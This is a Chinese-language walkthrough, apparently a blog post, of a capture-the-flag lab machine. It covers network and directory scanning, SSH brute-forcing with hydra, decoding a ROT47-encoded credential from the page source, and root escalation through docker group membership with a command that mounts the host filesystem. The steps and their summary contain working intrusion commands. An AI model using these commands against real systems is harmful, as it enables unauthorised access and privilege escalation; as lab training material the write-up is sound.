1.渗透环境及工具
系统环境:kali,CentOS linux
工具: netdiscover,nmap,dirb,nitko,hydra,docker,cewl
2.2.1 确定IP
使用工具扫描主机的 IP 以及开放的端口
命令:netdiscover -i eth0 -r 192.168.150.0/24 或者 arp-scan -l
发现目标机IP
2.2.2 信息收集
获取IP后,获取端口:nmap -sS -Pn-A -p- 192.168.150.148
发现开放了22和80端口
使用工具扫描网站目录:dirb http://192.168.150.148
发现目录,访问:192.168.150.148/noindex/
访问: 192.168.150.148/noindex/common/
发现没有有价值的信息。
2.2.3 漏洞扫描
对于22端口,使用searchsploit搜索OpenSSH
OpenSSH 8.0 没有发现漏洞
对于80端口,访问网站: http://192.168.150.148:80
发现一些用户名和密码,做成字典进行破解,没有成功。
使用hydra破解ssh:hydra -L user1.txt -P pass1.txt ssh://192.168.150.148
没有成功。
使用cewl生成网站字典:cewl http://192.168.220.148 > user2.txt
再使用hydra破解ssh:hydra -Luser2.txt -P user2.txt ssh://192.168.150.148
还是没有成功。
再观察网页内的账户密码,发现第四个不正常,猜测可能是加密后的,尝试对其进行解密。
查看源代码:
发现源代码末尾有ROT47的字样,百度查询看看
发现是位移加密,说明刚才对第四个账户的猜测是正确的,是进行加密后的,我们对该账户密码进行解密:
解密后账户密码:shailendra cybersploit1
尝试使用开放的ssh服务进行连接:ssh shailendra@192.168.150.148
登录成功.
使用id查看用户信息,sudo -l查看权限信信息
发现没有权限执行sudo,需要提权。
对网站进行漏洞扫描
命令:nikto -host 192.168.150.148
没有发现漏洞。
2.2.4 漏洞利用
没有其他漏洞
2.2.5 提权
利用SUID进行提权:find / -user root -perm -4000 -print 2>/dev/null
没有发现可以利用的点。
查看文件:ls
发现hint.txt文件,查看该文件,内容是:docker
猜测是使用docker提权,查看用户信息:id
发现当前用户在docker组,可以运行docker,再查看本地已经安装的镜像:dockerimages
下载docker镜像并启动容器:docker run -v /:/root -i -t ubuntu /bin/bash
-v绑定容器中的root目录
-i -t指定启动的镜像名称Ubuntu
/bin/bash 启动一个shell,并绑定容器中的root目录
启动后查看当前目录就是服务器的根目录
进入shell,切换到本机root目录,此时就是服务器的根目录,然后再切换root目录,就是服务器的root目录
3.总结
1、信息收集时,ROT47加密方法
ROT5:只对数字进行编码。用当前数字往后数的第五个数字替换当前数字;
如:123ab—>678ab
ROT13:只对字母进行编码,用当前字母往后数的第13个字母替换当前字母;
如:123ab—>123no
ROT18:将RPT5和ROT13组合在一起的;
如:123ab—>678no
ROT47:对数字,字母,常用符号进行编码,按照它们的ASCLL值进行位置替换,用当前字符的ASCLL值往后数的第47位字符替换当前字符;
用于ROT47编码的字符其ASCLL值范围是33~126
如:A(65)—>p(112)
2、提权时,用到了docker提权
docker run -v /:/root -i -t ubuntu /bin/bash
-v绑定容器中的root目录
-i -t指定启动的镜像名称Ubuntu
/bin/bash 启动一个shell,并绑定容器中的root目录
989
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
